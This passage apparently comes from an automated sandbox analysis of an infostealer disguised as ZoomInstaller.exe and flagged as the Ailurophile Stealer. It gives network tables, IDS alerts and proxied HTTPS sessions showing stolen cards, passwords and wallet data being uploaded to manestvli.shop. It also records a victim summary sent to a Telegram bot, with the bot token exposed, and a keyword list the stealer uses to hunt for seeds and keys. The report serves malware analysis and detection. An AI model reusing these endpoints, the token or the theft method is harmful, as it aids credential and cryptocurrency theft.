                                                                                  authorizerTrampoline20x1402e64b0
                                                                                  callbackTrampoline30x1402e6210
                                                                                  commitHookTrampoline40x1402e63a0
                                                                                  compareTrampoline50x1402e6310
                                                                                  doneTrampoline60x1402e62d0
                                                                                  preUpdateHookTrampoline70x1402e6530
                                                                                  rollbackHookTrampoline80x1402e6400
                                                                                  stepTrampoline90x1402e6270
                                                                                  updateHookTrampoline100x1402e6440

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-10-29T14:03:30.538215+01002057103ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop)1192.168.2.4654061.1.1.153UDP
                                                                                  2024-10-29T14:03:31.221087+01002057104ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI1192.168.2.449737188.114.97.3443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 29, 2024 14:03:05.835577965 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:05.835645914 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:05.835762978 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:05.837351084 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:05.837367058 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.450325966 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.450702906 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.450732946 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.450854063 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.450861931 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.451992035 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.452080011 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.507205963 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.507354975 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.507380962 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.555267096 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.555289984 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.602960110 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.676193953 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.676291943 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.676409006 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.676744938 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.676772118 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:06.676788092 CET49730443192.168.2.4104.26.9.59
                                                                                  Oct 29, 2024 14:03:06.676800013 CET44349730104.26.9.59192.168.2.4
                                                                                  Oct 29, 2024 14:03:30.555588007 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:30.555689096 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:30.555814028 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:30.556119919 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:30.556155920 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:31.212526083 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:31.221086979 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.221134901 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:31.221196890 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.221201897 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:31.222418070 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:31.222510099 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.414122105 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.414316893 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:31.414326906 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.414453983 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.414468050 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:31.414644003 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.414644003 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:31.414671898 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:32.069111109 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:32.069411039 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:32.069535017 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:32.069617987 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:32.069637060 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:32.069658995 CET49737443192.168.2.4188.114.97.3
                                                                                  Oct 29, 2024 14:03:32.069664955 CET44349737188.114.97.3192.168.2.4
                                                                                  Oct 29, 2024 14:03:32.080503941 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:32.080533028 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:32.080775023 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:32.080997944 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:32.081012011 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.064740896 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.065145969 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.065206051 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.065274954 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.065289021 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.066379070 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.066457987 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.067291975 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.067379951 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.067385912 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.067418098 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.067444086 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.114563942 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.114628077 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.162334919 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.440525055 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.440548897 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.440608025 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.440638065 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.440911055 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.440936089 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.441078901 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.441118002 CET44349738149.154.167.220192.168.2.4
                                                                                  Oct 29, 2024 14:03:33.441140890 CET49738443192.168.2.4149.154.167.220
                                                                                  Oct 29, 2024 14:03:33.441176891 CET49738443192.168.2.4149.154.167.220

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 29, 2024 14:03:05.822026968 CET4924653192.168.2.41.1.1.1
                                                                                  Oct 29, 2024 14:03:05.830513000 CET53492461.1.1.1192.168.2.4
                                                                                  Oct 29, 2024 14:03:30.538214922 CET6540653192.168.2.41.1.1.1
                                                                                  Oct 29, 2024 14:03:30.550745964 CET53654061.1.1.1192.168.2.4
                                                                                  Oct 29, 2024 14:03:32.071006060 CET6527153192.168.2.41.1.1.1
                                                                                  Oct 29, 2024 14:03:32.079205036 CET53652711.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 29, 2024 14:03:05.822026968 CET192.168.2.41.1.1.10xab61Standard query (0)api.myip.comA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 14:03:30.538214922 CET192.168.2.41.1.1.10xe34cStandard query (0)manestvli.shopA (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 14:03:32.071006060 CET192.168.2.41.1.1.10x2106Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 29, 2024 14:03:05.830513000 CET1.1.1.1192.168.2.40xab61No error (0)api.myip.com104.26.9.59A (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 14:03:05.830513000 CET1.1.1.1192.168.2.40xab61No error (0)api.myip.com104.26.8.59A (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 14:03:05.830513000 CET1.1.1.1192.168.2.40xab61No error (0)api.myip.com172.67.75.163A (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 14:03:30.550745964 CET1.1.1.1192.168.2.40xe34cNo error (0)manestvli.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 14:03:30.550745964 CET1.1.1.1192.168.2.40xe34cNo error (0)manestvli.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Oct 29, 2024 14:03:32.079205036 CET1.1.1.1192.168.2.40x2106No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • api.myip.com
                                                                                  • manestvli.shop
                                                                                  • api.telegram.org

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449730104.26.9.594437284C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 13:03:06 UTC93OUTGET / HTTP/1.1
                                                                                  Host: api.myip.com
                                                                                  User-Agent: Go-http-client/1.1
                                                                                  Accept-Encoding: gzip
                                                                                  2024-10-29 13:03:06 UTC567INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 13:03:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BkqWOmpgyXSbAY8yVnQngtazxdgRJzw1FTgCnCtTEFf0MDLEVK1GFskZav%2BDvm1mUsRfgebqvJ37WMlb%2FawNwomL21fssHhzL3Cb84Gc3SGzr1iaWF3fzOINc%2F0HZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da35d221de0a924-DFW
                                                                                  2024-10-29 13:03:06 UTC65INData Raw: 33 62 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 63 22 3a 22 55 53 22 7d 0d 0a
                                                                                  Data Ascii: 3b{"ip":"173.254.250.72","country":"United States","cc":"US"}
                                                                                  2024-10-29 13:03:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449737188.114.97.34437284C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 13:03:31 UTC810OUTPOST /upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTMzKzRqMldDaGJTYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bUJoMzNaZTlGOFpaaDRuSjdEdmR1cWw3S3JabnllZWM5K3A0Q2VqWW10bk1YZnJHMTlvNk9aZjNkKzA1TzdycUNYcXF4bnE5QzRvSUI4ckpxVlo0cmJscXlBYVgyYjBwcTR2WmlubUlDNG0zeDZncGFMdklpZ2w2cXNwS3ZVeDUrV2dOcWNsM2Q5bkh2T2U1MkFkSzJndzc2eFo1WnNyR1Y4bnFQUGdhZUFiUT09&hash=2d6441c1bfc749b0344f HTTP/1.1
                                                                                  Host: manestvli.shop
                                                                                  User-Agent: Go-http-client/1.1
                                                                                  Content-Length: 6347
                                                                                  Content-Type: multipart/form-data; boundary=c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794a
                                                                                  Accept-Encoding: gzip
                                                                                  2024-10-29 13:03:31 UTC376OUTData Raw: 2d 2d 63 34 66 37 61 61 61 34 32 66 66 34 61 38 62 30 61 35 32 63 36 62 30 31 63 31 33 33 38 31 63 66 63 36 39 39 33 39 33 37 62 34 33 38 64 65 34 61 34 65 66 61 36 35 32 35 37 39 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 41 69 6c 75 72 6f 70 68 69 6c 65 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 2f 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00 41 69 6c 75
                                                                                  Data Ascii: --c4f7aaa42ff4a8b0a52c6b01c13381cfc6993937b438de4a4efa6525794aContent-Disposition: form-data; name="file"; filename="Ailurophile.zip"Content-Type: application/octet-streamPKAilurophile/PKAilu
                                                                                  2024-10-29 13:03:31 UTC2372OUTData Raw: c5 e5 97 af 90 58 5a 92 9f 96 99 93 53 ac 90 96 5f 9a 97 a2 90 96 5f a4 e0 9e 9f 9f 9e 93 aa e0 92 9a 96 58 9a 53 c2 05 08 00 00 ff ff 50 4b 07 08 47 88 f4 14 53 00 00 00 56 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 2f 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 43 61 72 64 73 5c 43 61 72 64 73 2e 74 78 74 72 cc cc 29 2d ca 2f c8 c8 cc 49 55 08 2e 49 4d cc 49 2d 52 d0 55 08 49 cd 49 4d 2f 4a cc b5 52 70 40 52 50 96 c7 c5 e5 97 af 90 9c 58 94 52 ac 90 96 5f 9a 97 02 08 00 00 ff ff 50 4b 07 08 9d 40 e3 60 3b 00 00 00 3e 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00
                                                                                  Data Ascii: XZS__XSPKGSVPKAilurophile\Cards/PKAilurophile\Cards\Cards.txtr)-/IU.IMI-RUIIM/JRp@RPXR_PK@`;>PK
                                                                                  2024-10-29 13:03:31 UTC538OUTData Raw: 1c ad 3f 29 f1 17 e5 51 43 81 3c a0 04 a3 22 2d 30 65 a2 3c 68 a0 a3 86 42 94 df 34 d0 41 43 df 1c 34 dc 8c 2a 3f 66 ba 19 ec 69 21 ca 7c b4 d7 a5 87 4e 14 68 2a 9c 42 78 a2 c0 03 05 fe bb fa d8 5f d7 f7 cb 6e b1 55 5d 73 57 e6 9c 05 73 1e 85 67 a2 bb ce 3a a1 35 b8 3d c1 a6 ab b5 b2 7b d8 8a ae 1e 45 4d 70 2f 64 03 95 19 20 e4 58 28 77 46 7e 92 f2 52 91 44 10 c4 59 1c 65 61 fa 27 94 17 5a 48 1a 15 82 53 50 e0 3c 4c 08 23 91 72 4c 92 78 81 5c 16 b1 90 ac 4c 88 2d ae 84 fe c2 17 f9 1d 0b b7 4f 54 fb 15 da 71 a6 57 d2 57 13 18 ba 3d 21 4d 60 a8 4f 60 d8 0b d9 60 65 06 9c c0 ce 0d e6 9a 85 7e f8 1a 00 00 ff ff 50 4b 07 08 43 74 a4 df ea 01 00 00 b2 08 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 00 00 00 41 69 6c 75
                                                                                  Data Ascii: ?)QC<"-0e<hB4AC4*?fi!|Nh*Bx_nU]sWsg:5={EMp/d X(wF~RDYea'ZHSP<L#rLx\L-OTqWW=!M`O``e~PKCtPK)Ailu
                                                                                  2024-10-29 13:03:31 UTC3061OUTData Raw: 5c 5c 9e 5f 94 a2 90 96 5f 9a 97 02 08 00 00 ff ff 50 4b 07 08 56 91 d4 6f 3e 00 00 00 41 00 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2b 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 50 61 73 73 77 6f 72 64 73 5c 4d 69 63 72 6f 73 6f 66 74 2d 44 65 66 61 75 6c 74 2e 74 78 74 72 cc cc 29 2d ca 2f c8 c8 cc 49 55 08 2e 49 4d cc 49 2d 52 d0 55 08 49 cd 49 4d 2f 4a cc b5 52 70 40 52 50 96 c7 c5 e5 97 af 50 90 58 5c 5c 9e 5f 94 a2 90 96 5f 9a 97 02 08 00 00 ff ff 50 4b 07 08 56 91 d4 6f 3e 00 00 00 41 00 00 00 50 4b 03 04 14 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 41 69 6c 75 72 6f 70 68 69 6c 65 5c 57 61 6c 6c 65 74 73 2f 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: \\__PKVo>APK+Ailurophile\Passwords\Microsoft-Default.txtr)-/IU.IMI-RUIIM/JRp@RPPX\\__PKVo>APKAilurophile\Wallets/PK
                                                                                  2024-10-29 13:03:32 UTC796INHTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 13:03:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/8.0.30
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ul67Zn%2B%2ButD1SfyYfgIsrmtjPYBdSTVLAbuvDkwQFbblHfQeI%2FJfBrmCIqLVQ9U5zXUO3zc5adgh%2BqGIP4rVvzDGRjHVQFPfOw4audj5TLAAoPTaWi8l1HXr%2BCePexBe5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da35dbdb8152c8f-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1332&sent=9&recv=12&lost=0&retrans=0&sent_bytes=2834&recv_bytes=7860&delivery_rate=2035137&cwnd=251&unsent_bytes=0&cid=13be810c7047f43a&ts=866&x=0"
                                                                                  2024-10-29 13:03:32 UTC743INData Raw: 32 65 30 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 70 75 74 5f 63 6f 6e 74 65 6e 74 73 28 68 65 72 61 73 76 6e 78 61 69 6c 75 72 6f 70 68 69 6c 65 2f 41 69 6c 75 72 6f 70 68 69 6c 65 5f 36 37 32 30 64 64 32 33 64 39 66 34 66 33 2e 35 31 36 31 33 31 38 30 2e 7a 69 70 2f 6c 6f 67 2e 74 78 74 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 75 70 6c 6f 61 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 32 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65
                                                                                  Data Ascii: 2e0<br /><b>Warning</b>: file_put_contents(herasvnxailurophile/Ailurophile_6720dd23d9f4f3.51613180.zip/log.txt): Failed to open stream: No such file or directory in <b>C:\xampp\htdocs\upload.php</b> on line <b>42</b><br /><br /><b>Warning</b>: file
                                                                                  2024-10-29 13:03:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449738149.154.167.2204437284C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 13:03:33 UTC230OUTPOST /bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessage HTTP/1.1
                                                                                  Host: api.telegram.org
                                                                                  User-Agent: Go-http-client/1.1
                                                                                  Content-Length: 1727
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Accept-Encoding: gzip
                                                                                  2024-10-29 13:03:33 UTC956OUTData Raw: 63 68 61 74 5f 69 64 3d 36 38 34 33 32 31 32 35 31 34 26 70 61 72 73 65 5f 6d 6f 64 65 3d 48 54 4d 4c 26 74 65 78 74 3d 25 30 41 25 46 30 25 39 46 25 38 43 25 39 30 2b 25 33 43 62 25 33 45 49 50 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 25 30 41 25 46 30 25 39 46 25 38 46 25 42 33 2b 25 33 43 62 25 33 45 43 6f 75 6e 74 72 79 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 55 6e 69 74 65 64 2b 53 74 61 74 65 73 25 30 41 25 46 30 25 39 46 25 39 32 25 42 42 2b 25 33 43 62 25 33 45 48 6f 73 74 6e 61 6d 65 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 32 31 36 35 35 34 25 30 41 25 46 30 25 39 46 25 39 36 25 41 35 2b 25 33 43 62 25 33 45 50 43 2b 54 79 70 65 25 33 41 25 33 43 25 32 46 62 25 33 45 2b 4d 69 63 72 6f 73 6f 66 74 2b
                                                                                  Data Ascii: chat_id=6843212514&parse_mode=HTML&text=%0A%F0%9F%8C%90+%3Cb%3EIP%3A%3C%2Fb%3E+173.254.250.72%0A%F0%9F%8F%B3+%3Cb%3ECountry%3A%3C%2Fb%3E+United+States%0A%F0%9F%92%BB+%3Cb%3EHostname%3A%3C%2Fb%3E+216554%0A%F0%9F%96%A5+%3Cb%3EPC+Type%3A%3C%2Fb%3E+Microsoft+
                                                                                  2024-10-29 13:03:33 UTC771OUTData Raw: 70 74 65 2b 74 6f 6b 65 6e 2b 62 61 63 6b 75 70 2b 73 65 63 72 65 74 2b 73 65 65 64 2b 6d 6e 65 6d 6f 6e 69 63 2b 6d 65 6d 6f 72 69 63 2b 70 72 69 76 61 74 65 2b 6b 65 79 2b 70 61 73 73 70 68 72 61 73 65 2b 70 61 73 73 2b 70 68 72 61 73 65 2b 73 74 65 61 6c 2b 62 61 6e 6b 2b 69 6e 66 6f 2b 63 61 73 69 6e 6f 2b 70 72 76 2b 70 72 69 76 25 43 33 25 41 39 2b 70 72 69 76 65 2b 74 65 6c 65 67 72 61 6d 2b 69 64 65 6e 74 69 66 69 61 6e 74 2b 69 64 65 6e 74 69 66 69 61 6e 74 73 2b 70 65 72 73 6f 6e 6e 65 6c 2b 74 72 61 64 69 6e 67 2b 62 69 74 63 6f 69 6e 2b 73 61 75 76 65 67 61 72 64 65 2b 66 75 6e 64 73 2b 72 65 63 75 70 2b 6e 6f 74 65 25 35 44 25 30 41 25 30 41 25 46 30 25 39 46 25 39 34 25 38 44 2b 25 33 43 62 25 33 45 46 6f 75 6e 64 2b 31 2b 61 75 74 6f 66 69
                                                                                  Data Ascii: pte+token+backup+secret+seed+mnemonic+memoric+private+key+passphrase+pass+phrase+steal+bank+info+casino+prv+priv%C3%A9+prive+telegram+identifiant+identifiants+personnel+trading+bitcoin+sauvegarde+funds+recup+note%5D%0A%0A%F0%9F%94%8D+%3Cb%3EFound+1+autofi
                                                                                  2024-10-29 13:03:33 UTC389INHTTP/1.1 200 OK
                                                                                  Server: nginx/1.18.0
                                                                                  Date: Tue, 29 Oct 2024 13:03:33 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 2325
                                                                                  Connection: close
                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                  2024-10-29 13:03:33 UTC2325INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 37 36 32 38 32 32 35 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 63 68 61 74 62 6f 74 33 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 66 72 77 65 67 77 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 34 33 32 31 32 35 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 78 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 61 6c 5f 78 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 30 37 30 31 33 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 63 5c 75 64 66 31 30 20 49 50 3a 20 31 37 33 2e 32
                                                                                  Data Ascii: {"ok":true,"result":{"message_id":76,"from":{"id":7576282251,"is_bot":true,"first_name":"chatbot355","username":"frwegwebot"},"chat":{"id":6843212514,"first_name":"x1","username":"real_x1","type":"private"},"date":1730207013,"text":"\ud83c\udf10 IP: 173.2


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:09:03:04
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\ZoomInstaller.exe"
                                                                                  Imagebase:0x7ff6841c0000
                                                                                  File size:22'207'488 bytes
                                                                                  MD5 hash:806A6CCCE380785FAA45512CE603C580
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:09:03:06
